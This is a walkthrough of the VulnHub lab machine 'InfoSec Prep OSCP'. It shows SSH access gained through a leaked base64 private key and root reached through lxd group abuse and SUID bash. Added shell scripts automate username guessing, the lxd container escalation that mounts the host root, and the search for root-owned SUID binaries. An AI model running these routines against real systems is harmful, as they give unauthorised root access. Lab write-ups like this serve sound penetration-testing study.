InfoSec Prep OSCP - VulnHub Machine

Detailed walkthrough of the InfoSec Prep OSCP machine, released on VulnHub on 11 Jul 2020 by FalconSpy.

Machine Summary

The machine runs a WordPress web application. Enumerating directories reveals /secret.txt, which contains a base64-encoded SSH private key. After decoding it, we can log in as the user oscp with that key. From there we can escalate privileges to root in two ways: 1. exploiting membership of the lxd group, 2. exploiting the SUID bit set on bash.

Nmap Scan

As always, I started with an nmap scan of all TCP ports, with default scripts and version detection:

nmap -sC -sV -p- 192.168.0.101

Three ports are open:

Port    Service
22      ssh
80      http
33060   mysqlx

Enumeration on Port 80

The site was running WordPress, so I ran wpscan against it, but nothing useful came up. Manual browsing of the site also turned up no information that helped with enumeration.

I ran gobuster against the site to enumerate files and directories:

gobuster dir -u http://192.168.0.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf

/secret.txt looked interesting, so I opened it in the browser.

Acquiring User Shell

It was base64-encoded, so I decoded it; the result was an SSH private key.

echo "<base64 text from secret.txt>" | base64 -d > id_rsa

To log in over SSH with the private key we still need a username, so I tried guessing; the username oscp worked. The key file must also be restricted to owner-only permissions, otherwise ssh refuses to use it:

chmod 600 id_rsa

I logged in to the machine as oscp using the private key:

ssh -i id_rsa oscp@192.168.0.101
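The key-extraction step above, as an added shell example that is not part of the original write-up: it decodes the base64 text, refuses to proceed unless the result carries a private-key header, creates the file with owner-only permissions from the start rather than fixing them afterwards, and then tries a list of candidate usernames non-interactively. The target address, the username list and the sample base64 blob are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up. Target host, candidate
# usernames and the sample blob below are assumptions.

# decode_key <base64-text> <output-file>
# Decodes the blob (stripping whitespace copied from a browser), writes it
# with mode 0600, and fails unless the result has a PEM-style key header.
decode_key() {
    blob=$1
    out=$2
    old_umask=$(umask)
    umask 077                       # the file is born 0600, never world-readable
    printf '%s' "$blob" | tr -d ' \t\r\n' | base64 -d > "$out" 2>/dev/null || {
        umask "$old_umask"
        echo "base64 decode failed" >&2
        return 1
    }
    umask "$old_umask"
    grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$out" || {
        echo "decoded data is not a private key" >&2
        return 1
    }
    # Fingerprint is informational only: a corrupt paste shows up here.
    ssh-keygen -l -f "$out" < /dev/null 2>/dev/null || \
        echo "warning: ssh-keygen could not parse $out" >&2
    return 0
}

# try_users <key-file> <host> <user>...
# Attempts a non-interactive login with each candidate and prints the first
# username the key is accepted for. Exit status 1 if none works.
try_users() {
    key=$1
    host=$2
    shift 2
    for u in "$@"; do
        if ssh -i "$key" -o BatchMode=yes -o ConnectTimeout=5 \
               -o StrictHostKeyChecking=no "$u@$host" true 2>/dev/null; then
            echo "$u"
            return 0
        fi
    done
    return 1
}

# Constructed sample: a fake key wrapped the way secret.txt served it.
# It exercises decode_key offline; it is not a usable key.
sample_b64=$(printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'AAAA' \
                 '-----END OPENSSH PRIVATE KEY-----' | base64)

# Real run (assumed target 192.168.0.101): fetch, decode, then probe users.
if [ "${1:-}" = run ]; then
    decode_key "$(curl -s http://192.168.0.101/secret.txt)" ./id_rsa && \
        try_users ./id_rsa 192.168.0.101 oscp ubuntu admin
fi
```

Run it as `sh extract_key.sh run` against the assumed target; without the `run` argument it only defines the functions, so it can be sourced and used piecemeal.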

Privilege Escalation

Enumerating the machine as oscp, I found two things that could give us a root shell:

  1. The user is a member of the lxd group
  2. The SUID bit is set on /usr/bin/bash

Either of these gets us to root.

Privilege Escalation through Exploiting lxd group

LXC, short for Linux Containers, is an operating-system-level virtualization technology built on features of the Linux kernel.

LXD is a daemon with a REST API for managing LXC containers. The daemon runs as root and carries out requests from any member of the local lxd group without further authentication, so membership of that group is effectively equivalent to root: a low-privileged member can create a privileged container, mount the host's root filesystem into it as a disk device, and then read and write any host file as root from inside the container.

Running lxc by name did not work, so I called it by its full path under the snap directory, /snap/bin/lxc:

/snap/bin/lxc

First I initialised LXD, which creates the default storage pool and network bridge:

/snap/bin/lxd init

I accepted the default settings. Next, create a privileged container called test from the ubuntu:18.04 image:

/snap/bin/lxc init ubuntu:18.04 test -c security.privileged=true

We add a disk device to the container so that the host's entire root filesystem appears at /mnt/root inside it. This is a bind mount, not a copy, so anything written under /mnt/root changes the host:

/snap/bin/lxc config device add test whatever disk source=/ path=/mnt/root recursive=true

Now start the container:

/snap/bin/lxc start test

and get a shell inside it:

/snap/bin/lxc exec test bash

Inside the container we are root, and /mnt/root/root is the host's /root, so flag.txt can be read there. The same writable mount would let us change any host file, for example to add a root user or to set the SUID bit on a host binary.

This method needs the target machine to have internet access, because lxc init downloads the ubuntu:18.04 image from the remote image server. Offline, the same attack works if you build an image on your own machine, transfer it to the target, register it with lxc image import, and use that local alias instead.
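The whole lxd escalation, from the group check through the root shell, as an added shell example that is not part of the original write-up. It first confirms lxd group membership from the output of id, locates the lxc client even when only the snap copy exists, and then runs the five steps above in order. The container name pwn, the device name hostroot and the image alias argument are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up. Container name, device
# name and the image alias argument are assumptions.

# in_lxd_group <output of id>
# Returns 0 when the id(1) line lists a group named exactly lxd.
in_lxd_group() {
    printf '%s\n' "$1" | grep -Eq '(^|[,=])[0-9]+\(lxd\)'
}

# lxc_bin: prints the lxc client path. On this box it lives only under
# /snap/bin, which is not on the login shell's PATH.
lxc_bin() {
    if command -v lxc >/dev/null 2>&1; then
        command -v lxc
    elif [ -x /snap/bin/lxc ]; then
        echo /snap/bin/lxc
    else
        return 1
    fi
}

# escalate [image]
# With internet access the default ubuntu:18.04 is pulled from the remote
# image server. Offline, import an image first with
#   lxc image import <tarball> --alias local-img
# and pass that alias as the argument.
escalate() {
    image=${1:-ubuntu:18.04}
    name=pwn                                    # assumed container name
    in_lxd_group "$(id)" || { echo "not in lxd group" >&2; return 1; }
    lxc=$(lxc_bin) || { echo "lxc client not found" >&2; return 1; }
    lxd=$(command -v lxd 2>/dev/null || echo /snap/bin/lxd)

    "$lxd" init --auto                          # default storage pool + bridge
    "$lxc" init "$image" "$name" -c security.privileged=true
    # Bind-mount the host root (not a copy) at /mnt/root in the container.
    "$lxc" config device add "$name" hostroot disk \
        source=/ path=/mnt/root recursive=true
    "$lxc" start "$name"
    # We are root inside the container and /mnt/root is the host.
    "$lxc" exec "$name" -- sh -c 'cat /mnt/root/root/flag.txt; exec bash'
}

if [ "${1:-}" = run ]; then
    escalate "$2"
fi
```

Run it on the target as `sh lxd_esc.sh run` (or `sh lxd_esc.sh run local-img` after an offline image import); without the `run` argument it only defines the functions.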

Exploiting the misconfigured SUID - bash

SUID (set-user-ID) is a special permission bit on Linux executables. When it is set, the program runs with the effective user ID of the file's owner instead of the user who launched it. A root-owned binary with the SUID bit therefore runs with root privileges no matter who starts it.

We can list files with the SUID bit set using the command below (-perm -u=s is equivalent to -perm -4000):

find / -perm -u=s -type f 2>/dev/null

Bash was the interesting one. Bash normally drops privileges at startup when its effective UID differs from its real UID; the -p (privileged mode) flag tells it to keep them, so a root-owned SUID bash started with -p keeps euid=0. As documented on GTFOBins:

GTFOBins

bash -p

This gave us a shell with root privileges: id shows euid=0(root) while the real uid is still oscp.
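The SUID hunt above, as an added shell example that is not part of the original write-up: it enumerates setuid files, keeps only the root-owned ones (a setuid bit on a file owned by an unprivileged user only elevates to that user), and flags the binaries that can hand out a shell while keeping the elevated euid. The shell-capable list is an assumption drawn from the binaries GTFOBins documents under SUID.

```shell
#!/bin/sh
# Added example, not from the original write-up. The shell-capable list is
# an assumption based on GTFOBins' SUID entries.

# list_suid <dir>: files under <dir> with the setuid bit (same as -perm -u=s).
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# root_suid <dir>: only the setuid files owned by root. A setuid file owned
# by an ordinary user elevates to that user, which is rarely useful.
root_suid() {
    find "$1" -xdev -type f -perm -4000 -user root 2>/dev/null
}

# shell_capable <path>: 0 if the basename is a binary that spawns a shell
# without dropping the setuid euid (bash needs -p; the others run a command
# or an interpreter that inherits euid=0).
shell_capable() {
    case $(basename "$1") in
        bash|sh|dash|zsh|find|env|vim|python|python2|python3|perl|awk) return 0 ;;
        *) return 1 ;;
    esac
}

# report <dir>: print "mode owner path [SHELL]" for each root-owned setuid file.
report() {
    root_suid "$1" | while IFS= read -r f; do
        mode_owner=$(ls -ld "$f" | awk '{print $1, $3}')
        tag=""
        shell_capable "$f" && tag=" SHELL"
        echo "$mode_owner $f$tag"
    done
}

# Why "bash -p": bash compares euid with uid at startup and, when they
# differ, resets euid to uid unless started in privileged mode (-p). A
# root-owned setuid bash keeps euid=0 only when run as "bash -p".

if [ "${1:-}" = run ]; then
    report "${2:-/}"
fi
```

Run it as `sh suid_hunt.sh run` to scan the whole filesystem, or give a directory as the second argument to narrow the search.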

Happy Hacking !


© 2020. All rights reserved to r3dw0lf_sec.